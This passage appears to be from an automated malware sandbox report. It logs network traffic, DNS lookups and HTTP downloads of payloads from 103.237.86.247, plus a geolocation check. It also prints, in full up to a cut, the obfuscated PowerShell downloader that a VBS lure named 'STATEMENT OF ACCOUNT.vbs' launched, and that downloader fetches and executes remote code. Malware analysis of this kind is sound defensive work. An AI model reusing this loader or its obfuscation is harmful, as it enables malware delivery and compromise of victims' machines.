                  Jul 2, 2024 10:27:58.979800940 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.979809046 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979823112 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979840994 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.979861021 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.979887009 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979957104 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979975939 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979989052 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979999065 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980001926 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980015993 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980025053 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980030060 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980066061 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980118036 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980132103 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980144024 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980155945 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980169058 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980170012 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980181932 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980195045 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980196953 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980207920 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980215073 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980242968 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980334044 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980345964 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980359077 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980386019 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980408907 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980417967 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980431080 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980452061 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980463982 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980469942 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980477095 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980494022 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980514050 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980529070 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980539083 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980542898 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980556011 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980568886 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980582952 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980587006 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980597019 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980607986 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980612040 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980639935 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980664968 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980680943 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980693102 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980720043 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980755091 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980767012 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980779886 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980791092 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980818033 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980931997 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981107950 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981146097 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.981148005 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981230974 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981244087 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981255054 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981271029 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.981283903 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.981309891 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981322050 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981333971 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981345892 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981349945 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.981370926 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.981393099 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981405973 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981420040 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981432915 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981435061 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.981457949 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.981555939 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981568098 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981579065 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981591940 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981604099 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981607914 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.981635094 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.981647015 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.981895924 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.983144045 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983216047 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983269930 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983282089 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983303070 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983309031 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.983316898 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983341932 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.983349085 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983356953 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.983364105 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983397007 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.983438015 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983448982 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983460903 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983474970 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983498096 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.983522892 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.983639002 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983652115 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983663082 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983679056 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983692884 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983704090 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.983705044 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983719110 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983728886 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.983731031 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983741999 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.983746052 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983769894 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.983906984 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983951092 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.986192942 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:59.071449041 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:59.071477890 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:59.071491957 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:59.071502924 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:59.071516037 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:59.071530104 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:59.071533918 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:59.071530104 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:59.071547985 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:59.071567059 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:59.071574926 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:59.071587086 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:59.071598053 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:59.071610928 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:59.071610928 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:59.071625948 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:59.071636915 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:59.071636915 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:59.071659088 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:59.123405933 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:28:06.930775881 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:28:06.935759068 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.935775042 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.935794115 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.935806036 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.935816050 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.935827971 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:28:06.935847998 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:28:06.936037064 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.936048031 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.936064959 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.936074972 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.936083078 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.940849066 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.940862894 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.940872908 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.940881968 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.940891027 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.940959930 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.940969944 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:07.152750969 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:28:07.161415100 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:07.161474943 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:28:09.253257036 CEST946249739103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:09.254616976 CEST497399462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:28:09.259546995 CEST946249739103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:39.265721083 CEST946249739103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:39.266973972 CEST497399462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:28:39.272182941 CEST946249739103.237.87.159192.168.2.4
                  Jul 2, 2024 10:29:09.285011053 CEST946249739103.237.87.159192.168.2.4
                  Jul 2, 2024 10:29:09.451601028 CEST497399462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:29:10.346620083 CEST497399462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:29:10.351613998 CEST946249739103.237.87.159192.168.2.4
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Jul 2, 2024 10:27:54.803399086 CEST | 50305 | 53 | 192.168.2.4 | 1.1.1.1
                  Jul 2, 2024 10:27:54.816128016 CEST | 53 | 50305 | 1.1.1.1 | 192.168.2.4
                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                  Jul 2, 2024 10:27:54.803399086 CEST | 192.168.2.4 | 1.1.1.1 | 0x4dbb | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                  Jul 2, 2024 10:27:54.816128016 CEST | 1.1.1.1 | 192.168.2.4 | 0x4dbb | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                  • 103.237.86.247
                  • geoplugin.net
                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  0 | 192.168.2.4 | 49731 | 103.237.86.247 | 80 | 5352 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 2, 2024 10:27:03.940207958 CEST | 170 | OUT | GET /Udmagret.hhk HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                  Host: 103.237.86.247
                  Connection: Keep-Alive
                  Jul 2, 2024 10:27:04.914321899 CEST | 1236 | IN | HTTP/1.1 200 OK
                  Content-Type: application/octet-stream
                  Last-Modified: Tue, 02 Jul 2024 08:00:14 GMT
                  Accept-Ranges: bytes
                  ETag: "289dd6de55ccda1:0"
                  Server: Microsoft-IIS/8.5
                  Date: Tue, 02 Jul 2024 08:27:00 GMT
                  Content-Length: 459120


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  1 | 192.168.2.4 | 49738 | 103.237.86.247 | 80 | 7772 | C:\Program Files (x86)\Windows Mail\wab.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 2, 2024 10:27:48.102791071 CEST | 172 | OUT | GET /NtqoCaH77.bin HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                  Host: 103.237.86.247
                  Cache-Control: no-cache
                  Jul 2, 2024 10:27:49.085515976 CEST | 1236 | IN | HTTP/1.1 200 OK
                  Content-Type: application/octet-stream
                  Last-Modified: Tue, 02 Jul 2024 07:57:18 GMT
                  Accept-Ranges: bytes
                  ETag: "6a397655ccda1:0"
                  Server: Microsoft-IIS/8.5
                  Date: Tue, 02 Jul 2024 08:27:43 GMT
                  Content-Length: 494656


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  2 | 192.168.2.4 | 49741 | 178.237.33.50 | 80 | 7772 | C:\Program Files (x86)\Windows Mail\wab.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 2, 2024 10:27:54.823252916 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                  Host: geoplugin.net
                  Cache-Control: no-cache
                  Jul 2, 2024 10:27:55.434142113 CEST | 1170 | IN | HTTP/1.1 200 OK
                  date: Tue, 02 Jul 2024 08:27:55 GMT
                  server: Apache
                  content-length: 962
                  content-type: application/json; charset=utf-8
                  cache-control: public, max-age=300
                  access-control-allow-origin: *
                  Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}



                  Target ID:0
                  Start time:04:26:58
                  Start date:02/07/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\STATEMENT OF ACCOUNT.vbs"
                  Imagebase:0x7ff733cd0000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:1
                  Start time:04:27:00
                  Start date:02/07/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 
str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Snarlig ');Skildrerne (Gunflints 'Konkurr$ V.ndibgrigsvaalEfte slo VindicbPrierslaTeltn nlMandsdo:TresindCHippiati LillikrCen.rifcCarumseu AntiagmStolearsSidevejctransfor Gelosii Skarrib Nonp,riProclainR,ppledgUnga,va1Goldaks3Udkaare3Subtera=Keglesp$skyllesPGl,cocoaLftenebrHall,nboForandrlNordmane EksporeNonconssMaskins.ConfratsKunstvapDistriblKalvelbi Un erdtImmatri(Simplic$ColubriFStenf suStnkeprrStandsfiBoghandbKapitaluRub.ikkn.ejlensdDomicil) Ty gde ');Skildrerne (Gunflints 'Ndu gan[J.urnalN HjhuseeO,eosactBic,lor. 
,okhavSCoprop,eAlkoholrBrightsvNecrotyiRidsefjc lejereeInterlaPS,inetsoDipl.piisquawfinOstepintA.acathMInd.rdeaHamartonkortfriaPaasta.gPlanlgneStivnenrDegforh]Kom,ker:Foundfl: Hel,deSJordskreTransvecAg,ntdiu aderskrcoapti iLemlstetUncivilyPolemikPSubs,itr BlisteoCo.ntertBro.kaloP.everic CulturoSk,vbunlBuffsbe Fol,tb= nbigge Later.l[RkvrkerNArckinge VldesftProcent.de.mareSAntisepeReflekscBjergaruConniverKaynetfiEskamottDrypsseyNeiatidP P rrelrResinizo anzonet HypertoFonematcFarmlano Rneb,ilplastsfTdiningmy ImperspSterlaneUndervu]Svagt.e: Incine:RegildfTC.evisvlthermicsChi ois1 Satin.2Buffoon ');$Parolees=$Circumscribing133[0];$Tubae= (Gunflints 'Surclif$takeup.gmedaljelrelstatoB.rgmesbE ilemmaDribledl Stepch: up,rtiA PrograkRepavestAmaze saKdehusfnGeograft,eflatim under o Ce,sordoricycleV,stenfledvinscsCons.bs=KommandNIndefrye DurianwMammoni-,eprievO.accinibStrafpojBesvarbeTvety,icDunnabstLamslaa .hokolaSwoadedey Pe,tapsAtingantcigare e Wronskm Gigado.Bem strNLithophe.ynipidtPostmes. Ge metWHighlane.ellbirbdecim lCOutswinlv,vacehikmpestoeBesyngenS ibestt');$Tubae+=$Kundetjenestens[1];Skildrerne ($Tubae);Skildrerne (Gunflints 'Adresse$ PengelAKabardck Coun,etUfrihedaAlenlannSkalotttAsse,temPromerco Ste.dddSodalite Ska arl.istandsUnderpi.Bl ckfeHKnkkreseK,nspeoaphotogrdPredamneBarytafrUdke nes Bejdse[omhandl$StandarsRumsterpS,krestlF ltrediSynkopefUnpsychfSlalomk]fejltry=Scriptu$FourageCSulphopr B omsty MelicrpBiograftHurdlenoSmdexclgHelfredlLytter a Rebuttu N,ncomx Campe, ');$Lbetidens=Gunflints ' r maun$PardeddAFrilandkDimmestt Nu,bedaAngakoknReauthotUnpeggemE.tersloImpeevid nticomeIchthyil O.ticisHavar r. 
A.trinD GribanoFleshl wC,ristenG.ossopl Tris.eoAnimi ma Jagg.ed I,dekoFAce.ylsiOnsswiml Gearale Calibe(tryksva$PreschoPParitetaeffoliarStrawbro UnvitilKaffekoeO.ooutpe Libid.sCurariz, Hypopo$tndehvlAMixbloorPrimovinTbruddeoHomoeoglBrandbyd StandasMatchet)Pik nte ';$Arnolds=$Kundetjenestens[0];Skildrerne (Gunflints 'M.rkeds$UnpropegLoquitulBlankebo,ristesbBrigadeaRullendlDi.turb:SensomoKGleanabfDisagretGreggrie Bumpi,r ,ortcusTr posp=Okkerfo(GlossopT Scan.ae injenusContractAethere-AfbrydePBenzinsaFokuse.t banalehPorop.y Minimum$.nfeminA lagg,rrGr ynesnvognfuloForge slPti,imndSjldenhs Re.nbu)Snorker ');while (!$Kfters) {Skildrerne (Gunflints 'Acetoni$ Spa drgPtyali.lPrdikatoBor.glybSprogfoaLucarnelStylish:Altern,FUndvreraraxingpaNaalenedSomatoce,usiodi=Nedslag$FunctiotUdbytter PhobicuLuftvaae Recipr ') ;Skildrerne $Lbetidens;Skildrerne (Gunflints ' ForrenSMellemttTy letsa orgivrBrugel,tUpupakr-CirkulrSIfuga,ulEarflapeIndst,de BriarepSlisken Rudeskr4flashly ');Skildrerne (Gunflints 'F,rudbe$ Bentjegkvintetl TermomoSem.orgb epetrpa GotfrelUskadel:KransenK Rebaptf Udmrk.tGaylefreLeopardrmoralizs Infor =Fastkr ( onfesTTab osieUnfondns hangertstereos- DustouPbudgiesaSchistatPrinterh Improb Demogra$Urede,bA Kas kurTrommetnCari atoK ndinglKnalderdForud.esKarakte).ryllup ') ;Skildrerne (Gunflints 'acceler$CognacegMorfinil GennemoMangonibEfterfoaLipodyslteleuto:Pat ticSCente ec HjovneaSmaaovem DoctorpRonnif iRagtimeeP oalcosTonneau=Sphecin$Rambledg .arietlkons,ruoSanmar,bOktavera DagldelHobende:ReflowiCSystal ahydrocotPentagyhJatropha,dresserDeweddoimarchern Afvbni+Lsehast+Oriflam%Udspalt$ReflexoCKargoeriCentigrrPaa aefcDis avouSubtensmUnderspsT.oublecEcrus,arRligs eisaggonibKok,ttoiJohannenchylifig Reli,t1Tilbund3Ama,gam3 amvitt.GrassmecUpaaagtoSporinguStaktopnTjattentLantern ') ;$Parolees=$Circumscribing133[$Scampies];}$Bibliomanis=316121;$Rehumanized=28218;Skildrerne (Gunflints 'Zincode$Kjoveacgsnu fbolSe ibaroSpectrobMaalscoa Rubinsl Mononu: isidenao 
